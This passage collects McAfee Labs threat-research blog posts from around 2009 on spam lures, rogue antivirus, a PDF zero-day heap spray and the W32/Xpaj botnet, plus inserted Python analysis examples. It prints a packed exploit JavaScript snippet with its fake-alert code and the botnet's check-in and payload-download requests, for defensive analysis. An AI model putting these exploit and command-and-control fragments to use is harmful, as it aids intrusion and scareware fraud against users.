    (Again, don’t visit; just read.)


    Quite a diverse set, eh? The pornographic content is managed somewhat separately, and I really don’t want to make extra work for our legal team with this one!

    I doubt that’s all we’ll see this week. Passive DNS monitoring also shows that many of these are unused so far.

    There will be more on this one, I’m sure.

    Rogue AV Haunts Halloween

    Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us about Halloween-themed threats.

    In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

    Results for Halloween related keywords

    Redirected page that has the link to malware

    Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

    FakeAlert window

    What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

    Watch out for this and other malware during Halloween season, and keep your security products updated.

    Trick or Treat With Spam and Malicious Screensavers

    I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

    As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

    Halloween Viagra

    Here’s another:

    Holiday Scam Products

    And our favorite with a holiday spin:

    Canadian Halloween Pharmacy

    Here are a few message subjects to fear:

    Approved meds available without recipe!
    A HORRIFYING HALLOWEEN SALE!
    ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
    Biggest deal this halloween
    Low prices for big enlargement
    Halloween discount
    Annual Halloween Sale

    While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

    Malicious Halloween Screensavers

    Keep your security updated and search safely this week!

    Let’s Play ‘Find the Errors’

    I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending on your point of view.

    Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

    One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how this malware usually spreads:

  • Spam with the common “click here to see photos/videos/statement/etc…” links
  • IM (MSN Messenger, Skype, etc.)

    This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger–or at least an app that looks like Messenger.

    When you enter your username and password and press Enter, the app will exit. But in the background it will message all your contacts on your behalf, sending nice notes with links.

    Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

    fake and real

    Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

    Here are the answers, starting from the top and working downward.

    spot_the_dumbs

    1) The windows are different, and you can see the minimize/maximize/close buttons are different
    2) The help icon is the same, but when you click on it, no option is clickable
    3) The dropbox on the login name doesn’t work
    4) The status drop box doesn’t work
    5,6,7) The check boxes don’t work

    Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

    Balloon Boy Spam Drifts Through Town

    It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

    As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

    Subject: Drama With Balloon (Exclusive)

    All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

    Bogus Canadian Pharmacy Site

    Common subjects to beware of include:

    Little boy trapped in balloon
    Boy-balloon-madness
    balloon kid’s full story
    Balloon boy died
    Drama with balloon(exclusive)

    Be careful what you click, and mind the news. It is often the lure the spammers look for.

    My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

    Windows 7 Beaten to the Punch by Spam

    The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

    We’ve seen subjects that include:

    Microsoft Windows 7 special offers
    Windows 7 SP 2
    Windows 7 FAQ on release
    Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
    Windows7 ultimate 86% off
    Windows7 ultimate 57% off

    We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

    As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

    I thank my colleague Adam Wosotowsky for the background data!

    Cybercrime Organizations Turn to ‘Mafia-Style’ Structure

    In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

    One of the most interesting talks was given by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian company the Federal Trade Commission accused of running massive “scareware” schemes: alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to halt the company’s activities and freeze the assets of those behind the scams.

    Dirk explained that Innovative had more than 600 employees in real offices, subsidiaries in countries such as India, Poland, Canada, the United States, and Argentina, and even customer call centers. The company received approximately 4.5 million order IDs in 11 months–in other words, US$180 million (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appeared to be a legitimate front. Following its legal troubles, the company is now defunct, yet many employees have joined a new entity that has the same production targets.


    The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

    Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

    In the second part of his talk, Dmitri presented a timeline of events in the Eastern European carding underground. He discussed CarderPlanet and its hierarchical structure, set up like a mafia. (The source for the following image is NICSA-FBI-SSA, Michael J. McKeown.)

    CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

    Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

    The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

    • In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
    • In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. Thirty-four were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
    • This month in the United States, the FBI announced the results of Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identity theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

    All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

    ASCII Art Spam Strikes Back

    Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing URLs, abusing social networking sites, and many other techniques for spam to avoid getting caught.

    One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

    Example:

    ______    _____   ______    _       _____    _____     ___
    | ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
    | |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
    |    /   |  __|   |  __/   | |       | |    | |      |  _  |
    | |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
    \_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

    The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

    Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

    ASCII art spam is not limited to nonword characters such as _ and |. The glyphs can be built from numbers, letters, and combinations of both, which can make things even worse for certain spam filters:

    dP""b8  88     db     88     88  dP"Y8
    dP      88    dPYb    88     88 `bo
    Yb      88   dP__Yb   88     88   `Y8b
     YboodP 88  dP""""Yb  88ood8 88  8bodP'

    ASCII art spam example

    In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

    We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.
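As an added example (not part of the original post and not McAfee's code), here is a small heuristic in the spirit of the explanation above: a word drawn as ASCII art is a run of consecutive lines built from many short non-word tokens, whether those tokens are `| |_/` or `dP""b8`. The thresholds and the two art samples (retyped from the post) are my assumptions for the demo.

```python
"""Heuristic detector for ASCII-art spam in a plain-text message body.

Added example, not McAfee's code. Thresholds are assumptions for the demo.
"""
import re

# A token that looks like an ordinary word: three or more letters only.
WORD_TOKEN = re.compile(r"[A-Za-z]{3,}$")
PUNCT = ".,;:!?'\"()"


def _is_art_line(line, max_word_fraction, min_tokens):
    """A line is 'art-like' when it has several whitespace-separated tokens
    and almost none of them is a plain word. Glyph rows such as
    '| |_/ /  | |__' or 'dP""b8  88  db' have many tokens, all non-words."""
    tokens = line.split()
    if len(tokens) < min_tokens:
        return False
    words = sum(1 for t in tokens if WORD_TOKEN.match(t.strip(PUNCT)))
    return words / len(tokens) <= max_word_fraction


def ascii_art_blocks(body, max_word_fraction=0.25, min_tokens=3, min_lines=3):
    """Return (first, last) line indexes of every run of at least min_lines
    consecutive art-like lines.

    Requiring a run filters out one-line rulers ('-----') and signatures.
    Tabular numeric data can still trigger it, so treat the result as one
    input to a spam score rather than a verdict on its own."""
    lines = body.splitlines()
    blocks, start = [], None
    for i, line in enumerate(lines + [""]):        # sentinel flushes the last run
        if _is_art_line(line, max_word_fraction, min_tokens):
            if start is None:
                start = i
            continue
        if start is not None and i - start >= min_lines:
            blocks.append((start, i - 1))
        start = None
    return blocks


def looks_like_ascii_art_spam(body):
    return bool(ascii_art_blocks(body))


# Constructed samples: the two pieces of art shown in the post, retyped.
REPLICA_ART = "\n".join([
    " ______    _____   ______    _       _____    _____     ___",
    "| ___ \\  |  ___|  | ___ \\  | |     |_   _|  /  __ \\   / _ \\",
    "| |_/ /  | |__    | |_/ /  | |       | |    | /  \\/  / /_\\ \\",
    "|    /   |  __|   |  __/   | |       | |    | |      |  _  |",
    "| |\\ \\   | |___   | |      | |____  _| |_   | \\__/\\  | | | |",
    "\\_| \\_|  \\____/   \\_|      \\_____/  \\___/    \\____/  \\_| |_/",
])

CIALIS_ART = "\n".join([
    'dP""b8  88     db     88     88  dP"Y8',
    "dP      88    dPYb    88     88 `bo",
    "Yb      88   dP__Yb   88     88   `Y8b",
    " YboodP 88  dP\"\"\"\"Yb  88ood8 88  8bodP'",
])

if __name__ == "__main__":
    # Art embedded in an otherwise normal message: lines 2-7 are the glyph rows.
    mail = "Hi there,\n\n" + REPLICA_ART + "\nVisit our shop today!\n"
    print(ascii_art_blocks(mail))                # [(2, 7)]
    print(looks_like_ascii_art_spam(CIALIS_ART)) # True
```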

    Obama Nobel Prize Spam Links to Malware and Drive-By Attacks

    Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

    This spam campaign calls into question whether Obama deserved to win the prize and that the country is suffering significant fallout as a result. The email then requests that users click or copy/paste a link into their browsers that will direct them to a website where they can download more information.

    Obama Nobel Prize Spam

    If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember users believe that they are going to be downloading a report on the unrest created by Obama’s acceptance of the award.

    Obama Nobel Spam Site

    Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

    Encoded JS Script

    Decoding this JavaScript reveals that this page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identify this Trojan as Generic PWS.y!hv.i.

    This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over, and it continues to work because it keeps succeeding. Even if you think you are going to outwit the malware authors by visiting their website without downloading any files, the page could be executing JavaScript in the background. Those scripts open other pages/sites via invisible iframes, test your machine for unpatched vulnerabilities, and exploit them.

    Latest PDF Zero Day Leads to Exploit Egg Hunt

    Client-side exploitation continues to be a popular attack vector. Another zero-day attack has targeted Adobe Acrobat Reader to infiltrate customer networks. The currently unpatched exploit opens the door to code execution when a victim simply reads a malicious PDF document.

    The PDF’s embedded JavaScript code is viewable only once the compressed stream has been unpacked, as can be seen in this FileInsight screenshot:

    Although the content of the compressed stream may look like random data, when unpacked the JavaScript code fills a large memory area with malicious x86 machine code and causes the exploited Adobe software to execute this shellcode–a technique commonly known as a heap spray.

    To determine the final intent of the shellcode, we have to remove another obfuscation layer that attempts to evade automated detection. The machine code is embedded as a “malformed” and “escaped” sequence of hex bytes. Any occurrence of the substring “XX” is replaced with “%u” before JavaScript can convert the string back into binary, executable code.

    After loading it into a disassembler, we can see that the unescaped executable code is stage one of a two-stage attack. The intent of stage one is to identify the open file handle of the malicious PDF to find a particular signature (which is called an egg by exploit writers). This signature (0×0A666F65 in this example) is immediately followed by stage two of the shellcode and is then branched into.

    The screenshot below shows the presence of the PDF’s embedded egg, followed by x86 machine code, part of stage 2. The code contains another obfuscation layer, namely a routine that XOR decodes the remaining code and–surprise, surprise–unveils an embedded executable!

    The hidden executable, which is visible only in a hex editor after having applied the same XOR decoding, is written to disk and executed by the shellcode–thus highlighting the steps the attacker has taken to evade detection.
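    As an added analyst-side example (not code from the post or from McAfee), here is how the three unpacking steps just described could be reproduced in Python on a captured sample: substituting “%u” for the “XX” marker and unescaping the string to bytes, locating the 0x0A666F65 egg to find the start of stage two, and recovering the XOR-hidden executable. The single-byte XOR key and the PE-header search used to find it are assumptions; the post gives neither the key nor its length.

```python
import re
import struct

# Egg value quoted in the post; the stage-one shellcode scans the open PDF
# for it and branches to the code that immediately follows it.
EGG = 0x0A666F65

# Token grammar of a JavaScript-escaped string: %uHHHH (16-bit unit) or %HH.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def unescape_shellcode(escaped: str, marker: str = "XX") -> bytes:
    """Undo the obfuscation layer from the post: every occurrence of the
    marker ("XX" in the sample) stands for the hidden "%u" prefix. The
    repaired string is what the page feeds to JavaScript's unescape(); a
    heap spray stores each 16-bit unit little-endian, so bytes are emitted
    that way. Anything that is not an escape sequence raises ValueError,
    so a wrong marker is reported instead of silently producing garbage."""
    text = escaped.replace(marker, "%u")
    out = bytearray()
    pos = 0
    while pos < len(text):
        m = _ESCAPE.match(text, pos)
        if m is None:
            raise ValueError(f"unexpected data at offset {pos}: {text[pos:pos + 8]!r}")
        if m.group(1) is not None:
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    return bytes(out)


def find_stage_two(pdf: bytes, egg: int = EGG) -> int:
    """Locate the egg the way the stage-one shellcode does and return the
    file offset where stage two begins (just past the egg), or -1 if it is
    absent. The dword is compared little-endian, so in the file the egg
    reads 65 6F 66 0A, i.e. the ASCII text "eof\\n"."""
    needle = struct.pack("<I", egg)
    idx = pdf.find(needle)
    return -1 if idx < 0 else idx + len(needle)


def xor_decode(blob: bytes, key: int) -> bytes:
    """Single-byte XOR, the decoding the stage-two routine applies."""
    return bytes(b ^ key for b in blob)


def carve_xor_executable(blob: bytes):
    """Scan stage two for the XOR-obscured executable. Assumes a single-byte
    key (the post does not state its length). At each offset the key is
    forced by requiring 'M' there; it is accepted only if the next byte
    decodes to 'Z' and 'PE\\0\\0' appears at the e_lfanew offset read from
    0x3C of the DOS header. Returns (offset, key, decoded_bytes) or None."""
    for off in range(len(blob) - 0x40):
        key = blob[off] ^ ord("M")
        if blob[off + 1] ^ key != ord("Z"):
            continue
        head = xor_decode(blob[off:off + 0x40], key)
        e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
        sig_at = off + e_lfanew
        if sig_at + 4 > len(blob):
            continue
        if xor_decode(blob[sig_at:sig_at + 4], key) == b"PE\x00\x00":
            return off, key, xor_decode(blob[off:], key)
    return None


if __name__ == "__main__":
    # Constructed sample data, not bytes from the real exploit: a minimal
    # DOS/PE header pair XORed with key 0x5A, placed after the egg.
    fake_pe = b"MZ" + b"\x00" * 58 + b"\x40\x00\x00\x00" + b"PE\x00\x00" + b"\x00" * 16
    stage_two = b"\x90" * 8 + xor_decode(fake_pe, 0x5A)
    pdf = b"%PDF-1.4\n" + b"A" * 6 + struct.pack("<I", EGG) + stage_two

    print(unescape_shellcode("XX9090XXe8ff").hex())
    start = find_stage_two(pdf)
    print("stage two at offset", start)
    off, key, exe = carve_xor_executable(pdf[start:])
    print(f"executable at +{off}, key 0x{key:02x}, header {exe[:2]!r}")
```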

    McAfee Gateway Anti-Malware detected and blocked this threat proactively (“BehavesLike.PDF.Suspicious” and the embedded executable as “BehavesLike.Win32.Rootkit.H”). McAfee Artemis and the 5766 DATs block it, as well.

    Update, late October 13, 2009:

    Adobe has released a patch that remediates the above issue. Full details available here.

    McAfee Labs and the International Spy Museum

    Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor: contributing to the new International Spy Museum exhibit “Weapons of Mass Disruption.”

    Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

    Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

    As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

    These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. Amid that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

    So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

    The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

    McAfee Labs Releases October Spam Report

    Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

    Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

    The report can be downloaded here.

    W32/Xpaj Botnet Growing Rapidly

    Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

    Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The virus is building a widespread “zombie” network by taking control of thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during the last two weeks. The botnet has spread across many countries around the world. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

    Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

    To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. The malware authors use a cryptographic hash (the MD5 algorithm) to validate the authenticity of any payload received from the control server.

    Our analysis has not revealed any cryptographic system protecting the payload itself, so there is a chance for a rival to take control of the entire botnet.

    The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

    /GET /up.php?a=g2&cm=15A91F71

    The malicious host responds with the path to a binary containing further instructions and code to be executed:

    http://[infected]/stamm/stamm.dat
    http://[infected]/plugin/plugin.dat

    The first binary containing malicious instructions has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report it to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

    Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.

    Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

    • Keep your anti-virus software up to date
    • Apply all the latest security patches and keep your operating system up to date
    • Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

    Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

    Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

    Malware and standards – is it possible?

    I am excited to be involved in the joint industry effort of defining an XML format that will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list: IEEE ICSG.

    About 20 people from multiple security companies contributed to the development of the proposal for the standard, and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, and IPs will open endless possibilities for improving the security of all Internet users.

    For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

    But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

    • If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
    • If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
    • If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

    Here is what a portion of the XML meta-data looks like.

    XML meta-data

    If you are interested - the complete XML schema is available here and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

    Malware Authors Profit From Disasters

    McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

    While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:
    searchsamoa

    Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:
    samoainfection

    What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

    This is a snippet of the exploit being loaded:

    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

    And this is a snippet of an interesting part of the unobfuscated version of the exploit:

    {kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
    function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
    kPromo.alerts.windows.length:"alert_window_0";
    kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
    (kPromo.document.getDocumentElementByID(e));
    kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].

    The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

    After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

    stealing-info

    It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

    Rebranded Rogue Anti-Virus Strikes Again

    Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

    Alpha Antivirus is a new FakeAlert variant evolved from the Personal Antivirus family of rogue anti-virus software. Like many FakeAlert variants, Alpha Antivirus promotes itself through pop-up web pages hosted on malicious websites. These web pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scan of the affected system.

    online scanning

    Several domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus.

    The software prompts the user to install Alpha Antivirus. Once executed, it launches fake scanning and reports multiple infections:

    Alpha AV

    It also displays misleading pop-up warnings on the Windows taskbar.

    Alpha AV

    This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe and a msnaoladdon.dll component in the Windows System folder, and installs the DLL file as a browser helper object.

    (%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

    AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

    Frequently, we see abrupt changes in the branding, filenames, and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about new rogue anti-virus programs, malware authors repackage their “products” with new brand names and filenames and apply more obfuscation and encryption to their files, in an attempt to avoid being recognised by users and, in some cases, to evade detection by security vendors.

    Some known brand name and filename changes:

    1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll. (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

    2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

    3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

    4. From Spyware Protect 2009 to Antivirus System Pro

    As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

    Blast from the past: Fresh wave of targeted attacks using PowerPoint

    The use of social engineering to grab the attention of recipients and deliver malware is nothing novel. The latest trend in spreading malware is to exploit a current celebrity story, disaster or other high-profile news event. The threat may be delivered as email or as poisoned search-engine results that lead to malware. In the past, we have come across innumerable incidents such as Michael Jackson’s death or Benazir Bhutto’s assassination being used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used in targeted attacks against various high-profile users.

